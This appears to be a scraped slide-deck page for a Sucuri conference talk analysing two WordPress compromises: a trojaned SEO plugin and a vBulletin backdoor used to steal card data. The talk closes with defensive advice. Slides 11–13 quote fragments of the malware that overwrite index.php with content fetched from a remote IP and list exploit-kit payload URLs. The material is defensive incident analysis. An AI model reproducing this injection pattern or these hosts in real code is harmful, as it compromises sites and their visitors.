Joomla! Day Atlanta 2014 - Website Security - The BasicsJoomla! Day Atlanta 2014 - Website Security - The Basics
Joomla! Day Atlanta 2014 - Website Security - The BasicsTony Perez
 
Word press website security
Word press website securityWord press website security
Word press website securityTony Perez
 
WordPress Website Security - Trends, Threats, Defenses
WordPress Website Security - Trends, Threats, DefensesWordPress Website Security - Trends, Threats, Defenses
WordPress Website Security - Trends, Threats, DefensesTony Perez
 
WordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's HacksWordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's HacksTony Perez
 
WordPress Security - The "No-BS" Version
WordPress Security - The "No-BS" VersionWordPress Security - The "No-BS" Version
WordPress Security - The "No-BS" VersionTony Perez
 
Word camp orange county 2012 enduser security
Word camp orange county 2012 enduser securityWord camp orange county 2012 enduser security
Word camp orange county 2012 enduser securityTony Perez
 

More from Tony Perez (14)

A Practical Security Framework for Website Owners
A Practical Security Framework for Website OwnersA Practical Security Framework for Website Owners
A Practical Security Framework for Website Owners
 
2017 WHD - Bridging the Divide Between Behavior and Security
2017 WHD - Bridging the Divide Between Behavior and Security2017 WHD - Bridging the Divide Between Behavior and Security
2017 WHD - Bridging the Divide Between Behavior and Security
 
Accounting for Website Security in Higher Education
Accounting for Website Security in Higher EducationAccounting for Website Security in Higher Education
Accounting for Website Security in Higher Education
 
Building a Security Framework for Websites
Building a Security Framework for WebsitesBuilding a Security Framework for Websites
Building a Security Framework for Websites
 
Business of People - Lessons Learned Building a Remote Workforce
Business of People - Lessons Learned Building a Remote WorkforceBusiness of People - Lessons Learned Building a Remote Workforce
Business of People - Lessons Learned Building a Remote Workforce
 
Website Security (WordPress) - It's About the Basics
Website Security (WordPress) - It's About the BasicsWebsite Security (WordPress) - It's About the Basics
Website Security (WordPress) - It's About the Basics
 
Website Security - Latest and Greatest (WordPress 2014)
Website Security - Latest and Greatest (WordPress 2014)Website Security - Latest and Greatest (WordPress 2014)
Website Security - Latest and Greatest (WordPress 2014)
 
WordCamp Minneapolis 2014 - Website Security Presentation - Sucuri Security
WordCamp Minneapolis 2014 - Website Security Presentation - Sucuri SecurityWordCamp Minneapolis 2014 - Website Security Presentation - Sucuri Security
WordCamp Minneapolis 2014 - Website Security Presentation - Sucuri Security
 
Joomla! Day Atlanta 2014 - Website Security - The Basics
Joomla! Day Atlanta 2014 - Website Security - The BasicsJoomla! Day Atlanta 2014 - Website Security - The Basics
Joomla! Day Atlanta 2014 - Website Security - The Basics
 
Word press website security
Word press website securityWord press website security
Word press website security
 
WordPress Website Security - Trends, Threats, Defenses
WordPress Website Security - Trends, Threats, DefensesWordPress Website Security - Trends, Threats, Defenses
WordPress Website Security - Trends, Threats, Defenses
 
WordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's HacksWordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's Hacks
 
WordPress Security - The "No-BS" Version
WordPress Security - The "No-BS" VersionWordPress Security - The "No-BS" Version
WordPress Security - The "No-BS" Version
 
Word camp orange county 2012 enduser security
Word camp orange county 2012 enduser securityWord camp orange county 2012 enduser security
Word camp orange county 2012 enduser security
 

Recently uploaded

INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptxINTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptxHumphrey A Beña
 
4.11.24 Mass Incarceration and the New Jim Crow.pptx
4.11.24 Mass Incarceration and the New Jim Crow.pptx4.11.24 Mass Incarceration and the New Jim Crow.pptx
4.11.24 Mass Incarceration and the New Jim Crow.pptxmary850239
 
How to Manage Engineering to Order in Odoo 17
How to Manage Engineering to Order in Odoo 17How to Manage Engineering to Order in Odoo 17
How to Manage Engineering to Order in Odoo 17Celine George
 
Q4-PPT-Music9_Lesson-1-Romantic-Opera.pptx
Q4-PPT-Music9_Lesson-1-Romantic-Opera.pptxQ4-PPT-Music9_Lesson-1-Romantic-Opera.pptx
Q4-PPT-Music9_Lesson-1-Romantic-Opera.pptxlancelewisportillo
 
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxMULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxAnupkumar Sharma
 
week 1 cookery 8 fourth - quarter .pptx
week 1 cookery 8 fourth - quarter .pptxweek 1 cookery 8 fourth - quarter .pptx
week 1 cookery 8 fourth - quarter .pptxJonalynLegaspi2
 
Concurrency Control in Database Management system
Concurrency Control in Database Management systemConcurrency Control in Database Management system
Concurrency Control in Database Management systemChristalin Nelson
 
Expanded definition: technical and operational
Expanded definition: technical and operationalExpanded definition: technical and operational
Expanded definition: technical and operationalssuser3e220a
 
How to Fix XML SyntaxError in Odoo the 17
How to Fix XML SyntaxError in Odoo the 17How to Fix XML SyntaxError in Odoo the 17
How to Fix XML SyntaxError in Odoo the 17Celine George
 
4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptxmary850239
 
THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATION
THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATIONTHEORIES OF ORGANIZATION-PUBLIC ADMINISTRATION
THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATIONHumphrey A Beña
 
Multi Domain Alias In the Odoo 17 ERP Module
Multi Domain Alias In the Odoo 17 ERP ModuleMulti Domain Alias In the Odoo 17 ERP Module
Multi Domain Alias In the Odoo 17 ERP ModuleCeline George
 
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnv
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnvESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnv
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnvRicaMaeCastro1
 
ICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdfICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdfVanessa Camilleri
 
Congestive Cardiac Failure..presentation
Congestive Cardiac Failure..presentationCongestive Cardiac Failure..presentation
Congestive Cardiac Failure..presentationdeepaannamalai16
 
IPCRF/RPMS 2024 Classroom Observation tool is your access to the new performa...
IPCRF/RPMS 2024 Classroom Observation tool is your access to the new performa...IPCRF/RPMS 2024 Classroom Observation tool is your access to the new performa...
IPCRF/RPMS 2024 Classroom Observation tool is your access to the new performa...MerlizValdezGeronimo
 

Recently uploaded (20)

INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptxINTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
 
Paradigm shift in nursing research by RS MEHTA
Paradigm shift in nursing research by RS MEHTAParadigm shift in nursing research by RS MEHTA
Paradigm shift in nursing research by RS MEHTA
 
4.11.24 Mass Incarceration and the New Jim Crow.pptx
4.11.24 Mass Incarceration and the New Jim Crow.pptx4.11.24 Mass Incarceration and the New Jim Crow.pptx
4.11.24 Mass Incarceration and the New Jim Crow.pptx
 
How to Manage Engineering to Order in Odoo 17
How to Manage Engineering to Order in Odoo 17How to Manage Engineering to Order in Odoo 17
How to Manage Engineering to Order in Odoo 17
 
Q4-PPT-Music9_Lesson-1-Romantic-Opera.pptx
Q4-PPT-Music9_Lesson-1-Romantic-Opera.pptxQ4-PPT-Music9_Lesson-1-Romantic-Opera.pptx
Q4-PPT-Music9_Lesson-1-Romantic-Opera.pptx
 
INCLUSIVE EDUCATION PRACTICES FOR TEACHERS AND TRAINERS.pptx
INCLUSIVE EDUCATION PRACTICES FOR TEACHERS AND TRAINERS.pptxINCLUSIVE EDUCATION PRACTICES FOR TEACHERS AND TRAINERS.pptx
INCLUSIVE EDUCATION PRACTICES FOR TEACHERS AND TRAINERS.pptx
 
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxMULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
 
week 1 cookery 8 fourth - quarter .pptx
week 1 cookery 8 fourth - quarter .pptxweek 1 cookery 8 fourth - quarter .pptx
week 1 cookery 8 fourth - quarter .pptx
 
Concurrency Control in Database Management system
Concurrency Control in Database Management systemConcurrency Control in Database Management system
Concurrency Control in Database Management system
 
Expanded definition: technical and operational
Expanded definition: technical and operationalExpanded definition: technical and operational
Expanded definition: technical and operational
 
How to Fix XML SyntaxError in Odoo the 17
How to Fix XML SyntaxError in Odoo the 17How to Fix XML SyntaxError in Odoo the 17
How to Fix XML SyntaxError in Odoo the 17
 
4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx
 
THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATION
THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATIONTHEORIES OF ORGANIZATION-PUBLIC ADMINISTRATION
THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATION
 
Multi Domain Alias In the Odoo 17 ERP Module
Multi Domain Alias In the Odoo 17 ERP ModuleMulti Domain Alias In the Odoo 17 ERP Module
Multi Domain Alias In the Odoo 17 ERP Module
 
Mattingly "AI & Prompt Design: Large Language Models"
Mattingly "AI & Prompt Design: Large Language Models"Mattingly "AI & Prompt Design: Large Language Models"
Mattingly "AI & Prompt Design: Large Language Models"
 
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnv
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnvESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnv
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnv
 
Faculty Profile prashantha K EEE dept Sri Sairam college of Engineering
Faculty Profile prashantha K EEE dept Sri Sairam college of EngineeringFaculty Profile prashantha K EEE dept Sri Sairam college of Engineering
Faculty Profile prashantha K EEE dept Sri Sairam college of Engineering
 
ICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdfICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdf
 
Congestive Cardiac Failure..presentation
Congestive Cardiac Failure..presentationCongestive Cardiac Failure..presentation
Congestive Cardiac Failure..presentation
 
IPCRF/RPMS 2024 Classroom Observation tool is your access to the new performa...
IPCRF/RPMS 2024 Classroom Observation tool is your access to the new performa...IPCRF/RPMS 2024 Classroom Observation tool is your access to the new performa...
IPCRF/RPMS 2024 Classroom Observation tool is your access to the new performa...
 

WordPress Security - Learning From Hacks

  • 2. This is me! Sucuri Inc. Website Security o Incident Handling o Log Analysis o o Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 3. Let’s Learn from Website Attacks Analyze some of the things we have seen in recent days/weeks, and better understand what we need to be doing as website owners. Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 4.
  • 5. Attack Scenerios o The Art of Phishing o Stealing Credit Cards Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 6. Scenerio Uno (One) The art of Phishing Naive Users
  • 7. Attack of Opportunity o Holiday season / Holiday spirit o Did you say Free? Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 8.
  • 9. Red Flag[s] <A href="http://www.[infecteddomain].com.au/wp -content/all-in-one-seopack%20Pro%20v2.1.zip">All in One SEO Pack V2.1 Download Link</A> Red Alert: http://www.[infecteddomain].com.au Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 10. Difference o o Pro Version? Legit Version? Modified file: aioseop_class.php Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 11. Intent o Redirection - porn or exploit kits o Target: index.php o Taking content from here: $code_txt = 'http://91.239.15.61/o1.txt’; o Placing it in the files here: $index_path = $path.'/index.php'; if(file_put_contents($index_path, $code)){ Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 12. How? o Index.php payload: o Using curl to pull content from here: $url = http://91.239.15.61/java/google.php; Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 13. Payload o Pulls content from: http://91.239.15.61/google.js - Redirection to Porn Sites http://91.239.15.61/g.php - Exploit Kits Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 14. Lesson to Be Learned o Trust but verify sources o This is not isolated to just plugins, it can happen to themes as well o This is the season in which attackers prey on our need to spend $$$ and be online. Be vigilant! o The vulnerability was the website administrator… Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 15. Scenerio Dos (Two) Got e-Commerce? Leverage 3rd-party CMS applications in your stack?
  • 16. Got e-Commerce? o Business owners <3 E-commerce o CMS extensibility = WooCommerce o Quick setup of payment collection systems for goods o Awesome, right? Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 17. Big Target o Credit Card = Cha-Ching o Used/shared/sold underground o Impact is catastrophic o Blacklisting o Ban o No more cash flow! No more Trust! Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 18. Cross-contamination Simple concept in which your website is attacked and infected by a neighboring site in the same environment Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 19. vBulletin o Popular CMS Application for Forums o WordPress + vBulletin Configurations Common Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 20. Scenerio o WordPress: Main website | Blog | e-Commerce o vBulletin: Forum o 1 Server Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 21. Payload Found here: /wp-admin/includes/list.php Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 22. How? o It’s about the journey folks… Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 23. Scenerio o list.php? o shop.txt? Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 24. That’s Interesting /forum/ajax.php?edit= Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 25. vBulletin Plugin o Backdoor shell was installed into vBulletin giving the attacker the tools they needed to attack the WordPress installation. Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 26. Dump of Users Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 27. Attack Vector o Access Control Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 28. Lessons to be Learned o Attackers are smart – surprise!!! o Cross-contamination is a real threat today! o Must be diligent across our stack! o Isolate applications if possible. Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 29. What can you do? Lets get proactive!
  • 30. Harsh Reality None of the security plugins out there would have prevented either of these attacks. So much for all those hardening tips.. Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 31. Two Important Vectors o Access control o Within your control… o Software vulnerabilities o Not so much… Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 32. Defense in Depth • There is no single cure • Layered Defenses • Combination of tools and actions – Combine: Protection and Detection Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 33. Access Control o Google Authenticator – 2FA o http://wordpress.org/plugins/google-authenticator/ o Duo Security – 2FA o http://wordpress.org/plugins/duo-wordpress/ o Login Secure Solutions – Policy / Enforcement o http://wordpress.org/plugins/login-security-solution/ o Sucuri CloudProxy / Detection / Remedation - Complete Website Security o http://sucuri.net/signup Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 34. Software Vulnerabilities o Trusted Sources o Start with the repo and established communities o If you’re not a developer this is going to be beyond your reach mostly o Web Application Firewall (WAF) Plugins o Highly ineffective, evading and bypassing is easy o Cause Denial of Service attacks o SaaS based Web Application Firewall (WAF) more effective! o Sucuri CloudProxy WAF Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 35. Auditing • Know what is going on with your site – Integrity Checks – Logging in / Logging out – Changes being made • More important than half the hardening tips you read on line today • Options: – WP Security Audit log http://wordpress.org/plugins/wp-securityaudit-log/ – Sucuri Premium Plugin http://wordpress.sucuri.net Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 36. If all else fails… o Be sure you have backups… o VaultPress – WordPress Sites o Sucuri Backups – WordPress and Everything else o SaaS based Backups more effective! Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 37. Tony Perez @perezbox | @sucuri_security tony@sucuri.net #wordsesh Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox

Editor's Notes

  1. Defense in depth is a pretty standard phrase used in the security world in which there is no dependency on any one control, but rather a series of controls implemented throughout the stack to ensure the integrity and security. It’s simple and effective, yet many don’t apply it for whatever reason. We’re too busy focusing on that quick solution that will end all my problems. That one plugins that will harden my entire site to the point where I won’t be able to access it and none of my plugins will work.
  2. Be sure to check out Jason Cosper’s presentation earlier this evening, should be up on WordSesh soon, but he goes through some good tips on hardening your WordPress site.